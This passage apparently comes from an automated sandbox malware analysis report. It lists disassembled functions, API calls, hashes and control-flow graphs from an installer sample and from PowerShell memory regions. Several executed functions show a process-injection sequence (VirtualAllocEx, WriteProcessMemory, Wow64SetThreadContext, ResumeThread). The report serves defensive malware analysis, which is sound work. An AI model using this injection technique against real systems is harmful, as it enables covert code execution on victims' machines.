                                                                                                                                    • Instruction ID: 9291db8f65f8f9a8906298ccab22143765a9ea5c3e1cf5a275661437a5304794
                                                                                                                                    • Opcode Fuzzy Hash: 3e0f77edca3fe8d4731edd858be8c75d6ac57a75eac47466490e255ad15c8a0f
                                                                                                                                    • Instruction Fuzzy Hash: 22F08970602A21AFC6306F50FE09A9B7F68FB45B52B51053AF445B11ACCB345C91CB9D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405F2E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00406557: lstrcpynW.KERNEL32(?,?,00000400,004036A4,00433700,NSIS Error,?,00000008,0000000A,0000000C), ref: 00406564
                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(?,?,0042F270,?,00405F45,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405EDF
                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EE4
                                                                                                                                      • Part of subcall function 00405ED1: CharNextW.USER32(00000000), ref: 00405EFC
                                                                                                                                    • lstrlenW.KERNEL32(0042F270,00000000,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\,0043F000), ref: 00405F87
                                                                                                                                    • GetFileAttributesW.KERNEL32(0042F270,0042F270,0042F270,0042F270,0042F270,0042F270,00000000,0042F270,0042F270,74DF3420,?,C:\Users\user\AppData\Local\Temp\,00405C83,?,74DF3420,C:\Users\user\AppData\Local\Temp\), ref: 00405F97
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00405F2E
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 3248276644-3081826266
                                                                                                                                    • Opcode ID: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                    • Instruction ID: 0bce86d1d95a7c790b53086ee47358a3377499fb664fcb231eb74dc800c81f90
                                                                                                                                    • Opcode Fuzzy Hash: 7c21406a6ebf8fc224ae0ccc6b020e70a1639b7280e68367676f2d78d50147cb
                                                                                                                                    • Instruction Fuzzy Hash: 7AF0F43A105E1269D622733A5C09AAF1555CE86360B5A457BFC91B22C6CF3C8A42CCBE
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405550 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46windowCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • IsWindowVisible.USER32(?), ref: 0040557F
                                                                                                                                    • CallWindowProcW.USER32(?,?,?,?), ref: 004055D0
                                                                                                                                      • Part of subcall function 00404522: SendMessageW.USER32(?,00000000,00000000,00000000), ref: 00404534
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Window$CallMessageProcSendVisible
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3748168415-3916222277
                                                                                                                                    • Opcode ID: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                    • Instruction ID: 994decb8795c597c60d879b60f38f30bda4d2919c1ffc13ce94f3a2918c86729
                                                                                                                                    • Opcode Fuzzy Hash: 831ed5cf29225e66f7bf56ab76169cd98d2ca93c2364028159cf8fc7ca140134
                                                                                                                                    • Instruction Fuzzy Hash: 1C01717120060CBFEF219F11DD84A9B3B67EB84794F144037FA41761D5C7398D529A6D
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00403B94 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 19COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • FreeLibrary.KERNEL32(?,74DF3420,00000000,C:\Users\user\AppData\Local\Temp\,00403B6C,00403A82,?,?,00000008,0000000A,0000000C), ref: 00403BAE
                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00403BB5
                                                                                                                                    Strings
                                                                                                                                    • C:\Users\user\AppData\Local\Temp\, xrefs: 00403B94
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Free$GlobalLibrary
                                                                                                                                    • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                                    • API String ID: 1100898210-3081826266
                                                                                                                                    • Opcode ID: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                    • Instruction ID: cb28855b84c3abb27e6c937247341fa4f051846acd49e0d4b6103447305c23c4
                                                                                                                                    • Opcode Fuzzy Hash: 522759d04011631da2fa13ba2704cf46823a2ab452b41ebb0ecea140ccdeae61
                                                                                                                                    • Instruction Fuzzy Hash: 5DE0C23362083097C6311F55EE04B1A7778AF89B2AF01402AEC407B2618B74AC538FCC
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 00405FAC Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    APIs
                                                                                                                                    • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBC
                                                                                                                                    • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405FD4
                                                                                                                                    • CharNextA.USER32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FE5
                                                                                                                                    • lstrlenA.KERNEL32(00000000,?,00000000,00406291,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FEE
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1636011572.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1635997704.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636026385.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.000000000040D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636041085.0000000000441000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1636101853.0000000000445000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_400000_f6FauZ2CEz.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: lstrlen$CharNextlstrcmpi
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 190613189-0
                                                                                                                                    • Opcode ID: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                    • Instruction ID: e9567a821587a5f0376c4e2be66d4cfc8c6f540c5076303c4651ac02cb4e93c6
                                                                                                                                    • Opcode Fuzzy Hash: 2e04212541fd7d2d0fc4f715182178ccf0de62a07a1c27cf83518a5c6c9cf375
                                                                                                                                    • Instruction Fuzzy Hash: E1F09631105519FFC7029FA5DE00D9FBBA8EF05350B2540B9F840F7250D678DE01AB69
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Executed Functions

                                                                                                                                    Function 04E429F0 Relevance: .2, Instructions: 215COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.1648710936.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_4e40000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: bc201155a2ec50180798f78bafa606917097d8106640a1a7eb45077eed3adfac
                                                                                                                                    • Instruction ID: 263f02ba94c0917d6e1e07beec723024e654b2d110f43f987758f8832d9e437d
                                                                                                                                    • Opcode Fuzzy Hash: bc201155a2ec50180798f78bafa606917097d8106640a1a7eb45077eed3adfac
                                                                                                                                    • Instruction Fuzzy Hash: 2191BD74A002058FCB15CF59C4989AEFBB1FF88314B248699E955AB3A5C735FC81CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 04E42B00 Relevance: .1, Instructions: 107COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.1648710936.0000000004E40000.00000040.00000800.00020000.00000000.sdmp, Offset: 04E40000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_4e40000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: c62f278f444645cdd1e2a35b24a0227f6605807821875bf12ae5775c8e903235
                                                                                                                                    • Instruction ID: 856414bdb61c1f278efa02f4509fb3efcdca9cf56a7ddfa17c28e85d3cae8d4b
                                                                                                                                    • Opcode Fuzzy Hash: c62f278f444645cdd1e2a35b24a0227f6605807821875bf12ae5775c8e903235
                                                                                                                                    • Instruction Fuzzy Hash: C34169B4A001058FCB09CF59D1989AEFBB1FF88314B158599E915AB364C736FC91CFA0
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0485D01D Relevance: .0, Instructions: 45COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.1648440373.000000000485D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_485d000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 63ff792978bb5655cea242958bc780d36bcaa7bade9cdf4d89a0930e99bc9088
                                                                                                                                    • Instruction ID: 2f679c471c6fd8c7fe6cffd6a1eba96f6b7f7afcd3f212d2a833d6bba7e67809
                                                                                                                                    • Opcode Fuzzy Hash: 63ff792978bb5655cea242958bc780d36bcaa7bade9cdf4d89a0930e99bc9088
                                                                                                                                    • Instruction Fuzzy Hash: 8C012B311083049AE710AE26DD84767BFD8DF41324F08CA2AEC088F256C279E845CAB1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0485D005 Relevance: .0, Instructions: 43COMMON
                                                                                                                                    Download Yara Rule
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000004.00000002.1648440373.000000000485D000.00000040.00000800.00020000.00000000.sdmp, Offset: 0485D000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_4_2_485d000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID:
                                                                                                                                    • Opcode ID: 2d789836a5b56676bfafa6c0519da357b926c08d28f839ffeff0b61ef487ba8f
                                                                                                                                    • Instruction ID: 8f4487c540fd8eb3faaade292e7bc50a444420d0a6ffb3b292a410eaaabad7e3
                                                                                                                                    • Opcode Fuzzy Hash: 2d789836a5b56676bfafa6c0519da357b926c08d28f839ffeff0b61ef487ba8f
                                                                                                                                    • Instruction Fuzzy Hash: 5F01406100E3C09ED7129B259994B56BFB4DF53224F18C5DBDD888F1A3C2699849C772
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Execution Graph

                                                                                                                                    Execution Coverage:4.4%
                                                                                                                                    Dynamic/Decrypted Code Coverage:0%
                                                                                                                                    Signature Coverage:0%
                                                                                                                                    Total number of Nodes:12
                                                                                                                                    Total number of Limit Nodes:0
                                                                                                                                    execution_graph 14717 517fb30 14718 517fb74 ResumeThread 14717->14718 14720 517fbc0 14718->14720 14721 517fc20 14722 517fc69 Wow64SetThreadContext 14721->14722 14724 517fce1 14722->14724 14725 517fd48 14726 517fd8c VirtualAllocEx 14725->14726 14728 517fe04 14726->14728 14729 517fe68 14730 517feb4 WriteProcessMemory 14729->14730 14732 517ff4d 14730->14732

                                                                                                                                    Executed Functions

                                                                                                                                    Function 07D742AE Relevance: 8.7, Strings: 6, Instructions: 1184COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 0 7d742ae-7d742b1 1 7d742b7-7d742bf 0->1 2 7d742b3-7d742b5 0->2 3 7d742d7-7d742db 1->3 4 7d742c1-7d742c7 1->4 2->1 7 7d742e1-7d742e5 3->7 8 7d744ba-7d744c4 3->8 5 7d742cb-7d742d5 4->5 6 7d742c9 4->6 5->3 6->3 11 7d742e7-7d742f8 7->11 12 7d74325 7->12 9 7d744c6-7d744cf 8->9 10 7d744d2-7d744d8 8->10 14 7d744de-7d744ea 10->14 15 7d744da-7d744dc 10->15 22 7d74512-7d74521 call 7d7452b 11->22 23 7d742fe-7d74303 11->23 13 7d74327-7d74329 12->13 13->8 17 7d7432f-7d74335 13->17 18 7d744ec-7d7450f 14->18 15->18 17->8 20 7d7433b-7d74348 17->20 24 7d743de-7d7441d 20->24 25 7d7434e-7d74353 20->25 27 7d74305-7d7430b 23->27 28 7d7431b-7d74323 23->28 54 7d74424-7d74428 24->54 30 7d74355-7d7435b 25->30 31 7d7436b-7d74381 25->31 32 7d7430f-7d74319 27->32 33 7d7430d 27->33 28->13 35 7d7435f-7d74369 30->35 36 7d7435d 30->36 31->24 42 7d74383-7d743a3 31->42 32->28 33->28 35->31 36->31 47 7d743a5-7d743ab 42->47 48 7d743bd-7d743dc 42->48 49 7d743af-7d743bb 47->49 50 7d743ad 47->50 48->54 49->48 50->48 55 7d7444b 54->55 56 7d7442a-7d74433 54->56 60 7d7444e-7d7445a 55->60 58 7d74435-7d74438 56->58 59 7d7443a-7d74447 56->59 61 7d74449 58->61 59->61 62 7d74460-7d744b7 60->62 61->60
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: (o^q$(o^q$84al$84al$tP^q$tP^q
                                                                                                                                    • API String ID: 0-3493605685
                                                                                                                                    • Opcode ID: 4f8833deb5364fb3f87f8da6883af53ae952b59b768d4e8e6040e6a80033b01a
                                                                                                                                    • Instruction ID: 8c0256e5e3eaa1822cc12ad6bead632f46cfabaa9ca817b977acb1ccdb76047f
                                                                                                                                    • Opcode Fuzzy Hash: 4f8833deb5364fb3f87f8da6883af53ae952b59b768d4e8e6040e6a80033b01a
                                                                                                                                    • Instruction Fuzzy Hash: E56145B0B40289DFCB16DF68C845B6AFBE2BF86310F148465E8494F395EB71D851CB91
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07D73D08 Relevance: 7.8, Strings: 6, Instructions: 268COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 65 7d73d08-7d73d17 66 7d73d37 65->66 67 7d73d19-7d73d35 65->67 68 7d73d39-7d73d3b 66->68 67->68 70 7d73de7-7d73df1 68->70 71 7d73d41-7d73d48 68->71 72 7d73df3-7d73dfa 70->72 73 7d73dfd-7d73e03 70->73 74 7d73e35-7d73e7d 71->74 75 7d73d4e-7d73d53 71->75 78 7d73e05-7d73e07 73->78 79 7d73e09-7d73e15 73->79 85 7d73e83-7d73e88 74->85 86 7d73fc1-7d7401e 74->86 76 7d73d55-7d73d5b 75->76 77 7d73d6b-7d73d81 75->77 81 7d73d5f-7d73d69 76->81 82 7d73d5d 76->82 77->74 92 7d73d87-7d73da9 77->92 84 7d73e17-7d73e32 78->84 79->84 81->77 82->77 90 7d73ea0-7d73eac 85->90 91 7d73e8a-7d73e90 85->91 103 7d73eb2-7d73eb5 90->103 104 7d73f6e-7d73f78 90->104 94 7d73e94-7d73e9e 91->94 95 7d73e92 91->95 101 7d73dc3-7d73dce 92->101 102 7d73dab-7d73db1 92->102 94->90 95->90 110 7d73dd3-7d73de4 101->110 107 7d73db5-7d73dc1 102->107 108 7d73db3 102->108 103->104 109 7d73ebb-7d73ec2 103->109 105 7d73f86-7d73f8c 104->105 106 7d73f7a-7d73f83 104->106 111 7d73f92-7d73f9e 105->111 112 7d73f8e-7d73f90 105->112 107->101 108->101 109->86 113 7d73ec8-7d73ecd 109->113 116 7d73fa0-7d73fbe 111->116 112->116 114 7d73ee5-7d73ee9 113->114 115 7d73ecf-7d73ed5 113->115 114->104 121 7d73eef-7d73ef1 114->121 118 7d73ed7 115->118 119 7d73ed9-7d73ee3 115->119 118->114 119->114 121->104 123 7d73ef3 121->123 126 7d73efa-7d73efc 123->126 128 7d73f14-7d73f6b 126->128 129 7d73efe-7d73f04 126->129 130 7d73f06 129->130 131 7d73f08-7d73f0a 129->131 130->128 131->128
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 4'^q$4'^q$84al$84al$tP^q$tP^q
                                                                                                                                    • API String ID: 0-243610401
                                                                                                                                    • Opcode ID: 66e8ee22b2f5b163fc4e5279ecb0e5cfba199e074d80db4be81df9103ede9a0d
                                                                                                                                    • Instruction ID: 40bead7c51bb411b36f369476c56a0cdec57051e17ebeb5e3b62779a608bddf6
                                                                                                                                    • Opcode Fuzzy Hash: 66e8ee22b2f5b163fc4e5279ecb0e5cfba199e074d80db4be81df9103ede9a0d
                                                                                                                                    • Instruction Fuzzy Hash: 977122B17083958FCB158B2DD84466AFFF2AF85220F1884BBE445CB291EB32CC45D7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 07D73CE8 Relevance: 2.6, Strings: 2, Instructions: 81COMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 133 7d73ce8-7d73d17 135 7d73d37 133->135 136 7d73d19-7d73d35 133->136 137 7d73d39-7d73d3b 135->137 136->137 139 7d73de7-7d73df1 137->139 140 7d73d41-7d73d48 137->140 141 7d73df3-7d73dfa 139->141 142 7d73dfd-7d73e03 139->142 143 7d73e35-7d73e7d 140->143 144 7d73d4e-7d73d53 140->144 147 7d73e05-7d73e07 142->147 148 7d73e09-7d73e15 142->148 154 7d73e83-7d73e88 143->154 155 7d73fc1-7d7401e 143->155 145 7d73d55-7d73d5b 144->145 146 7d73d6b-7d73d81 144->146 150 7d73d5f-7d73d69 145->150 151 7d73d5d 145->151 146->143 161 7d73d87-7d73da9 146->161 153 7d73e17-7d73e32 147->153 148->153 150->146 151->146 159 7d73ea0-7d73eac 154->159 160 7d73e8a-7d73e90 154->160 172 7d73eb2-7d73eb5 159->172 173 7d73f6e-7d73f78 159->173 163 7d73e94-7d73e9e 160->163 164 7d73e92 160->164 170 7d73dc3-7d73dce 161->170 171 7d73dab-7d73db1 161->171 163->159 164->159 179 7d73dd3-7d73de4 170->179 176 7d73db5-7d73dc1 171->176 177 7d73db3 171->177 172->173 178 7d73ebb-7d73ec2 172->178 174 7d73f86-7d73f8c 173->174 175 7d73f7a-7d73f83 173->175 180 7d73f92-7d73f9e 174->180 181 7d73f8e-7d73f90 174->181 176->170 177->170 178->155 182 7d73ec8-7d73ecd 178->182 185 7d73fa0-7d73fbe 180->185 181->185 183 7d73ee5-7d73ee9 182->183 184 7d73ecf-7d73ed5 182->184 183->173 190 7d73eef-7d73ef1 183->190 187 7d73ed7 184->187 188 7d73ed9-7d73ee3 184->188 187->183 188->183 190->173 192 7d73ef3 190->192 195 7d73efa-7d73efc 192->195 197 7d73f14-7d73f6b 195->197 198 7d73efe-7d73f04 195->198 199 7d73f06 198->199 200 7d73f08-7d73f0a 198->200 199->197 200->197
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1735395891.0000000007D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 07D70000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_7d70000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID:
                                                                                                                                    • String ID: 84al$tP^q
                                                                                                                                    • API String ID: 0-2668233308
                                                                                                                                    • Opcode ID: e24b7d59918c4ebd329d6cf6837b44323763026f397423655903ae961e1879d4
                                                                                                                                    • Instruction ID: 55132450d4d3de5251c28d8ed54b4dd1fea4b1c07428f39de4daafadcb5d70e6
                                                                                                                                    • Opcode Fuzzy Hash: e24b7d59918c4ebd329d6cf6837b44323763026f397423655903ae961e1879d4
                                                                                                                                    • Instruction Fuzzy Hash: 732106B12043C59FD7159B29C884BA5FFF2AF46620F1880A6E444CF2A2DB75CC86C7A1
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0517FE68 Relevance: 1.6, APIs: 1, Instructions: 116injectionCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 202 517fe68-517fed3 204 517fed5-517fee7 202->204 205 517feea-517ff4b WriteProcessMemory 202->205 204->205 207 517ff54-517ffa6 205->207 208 517ff4d-517ff53 205->208 208->207
                                                                                                                                    APIs
                                                                                                                                    • WriteProcessMemory.KERNELBASE(?,?,?,?,?), ref: 0517FF3B
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713531774.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_5170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: MemoryProcessWrite
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3559483778-0
                                                                                                                                    • Opcode ID: da8c0ded0fce301f747fe776dea71df042b9f7a40fc01683a73f957d017c4f2f
                                                                                                                                    • Instruction ID: 1b02f8cdd71bffb74c2a253535c357968424ad32edbd13870dd43759ffbb1e66
                                                                                                                                    • Opcode Fuzzy Hash: da8c0ded0fce301f747fe776dea71df042b9f7a40fc01683a73f957d017c4f2f
                                                                                                                                    • Instruction Fuzzy Hash: 684199B5D052589FCF00CFA9D984ADEFBF1BB49310F24902AE819B7210D738AA45CF64
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0517FD48 Relevance: 1.6, APIs: 1, Instructions: 101memoryCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 213 517fd48-517fe02 VirtualAllocEx 216 517fe04-517fe0a 213->216 217 517fe0b-517fe55 213->217 216->217
                                                                                                                                    APIs
                                                                                                                                    • VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 0517FDF2
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000005.00000002.1713531774.0000000005170000.00000040.00000800.00020000.00000000.sdmp, Offset: 05170000, based on PE: false
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_5_2_5170000_powershell.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: AllocVirtual
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 4275171209-0
                                                                                                                                    • Opcode ID: f587cbd162d50f936b749f6bca58fe7e8b67fd964605f5e4ee089c9ff38f5009
                                                                                                                                    • Instruction ID: 5339f0b768e11b767c25fee86514ce9100fdbac47ecf92f35cd81c386ae388be
                                                                                                                                    • Opcode Fuzzy Hash: f587cbd162d50f936b749f6bca58fe7e8b67fd964605f5e4ee089c9ff38f5009
                                                                                                                                    • Instruction Fuzzy Hash: D63189B9D04258DFCF10CFA9D984ADEFBB1BB49320F10942AE815B7210D735A945CF58
                                                                                                                                    Uniqueness

                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                    Function 0517FC20 Relevance: 1.6, APIs: 1, Instructions: 94threadCOMMON
                                                                                                                                    Download Yara Rule

                                                                                                                                    Control-flow Graph

                                                                                                                                    • Executed
                                                                                                                                    • Not Executed
                                                                                                                                    control_flow_graph 222 517fc20-517fc80 224 517fc97-517fcdf Wow64SetThreadContext 222->224 225 517fc82-517fc94 222->225 227 517fce1-517fce7 224->227 228 517fce8-517fd34 224->228 225->224 227->228
                                                                                                                                    APIs
